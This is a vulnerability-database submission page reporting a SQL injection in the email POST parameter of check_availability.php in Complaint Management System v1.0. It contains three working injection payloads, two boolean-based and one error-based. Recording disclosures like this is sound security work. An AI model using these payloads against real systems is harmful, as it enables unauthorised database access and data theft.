Submeter #112686: Complaint Management System v1.0 /Complaint Management System/users/check_availability.php POST parameter email exists SQL injection vulnerabilityinformação

TítuloComplaint Management System v1.0 /Complaint Management System/users/check_availability.php POST parameter email exists SQL injection vulnerability
DescriçãoAn issue was discovered in Complaint Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /Complaint Management System/users/check_availability.php post parameter email. Payload1:[email protected]' and 'u'='u Payload2:[email protected]' and 'u'='w Payload3:[email protected]' and (select 1 from(select count(*),concat(0x51525354,(select (elt(999=999,1))),0x65666768,floor(rand(0)*2))x from information_schema.plugins group by x)a) and 'v'='v
Fonte⚠️ https://github.com/qinyiqun/bug_report/blob/main/SQLi.md
Utilizador
 qinyiqun123 (UID 44722)
Submissão11/04/2023 12h14 (há 3 anos)
Moderação11/04/2023 18h32 (6 hours later)
EstadoAceite
Entrada VulDB225532 [SourceCodester Complaint Management System 1.0 POST Parameter check_availability.php email Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Do you want to use VulDB in your project?

Use the official API to access entries easily!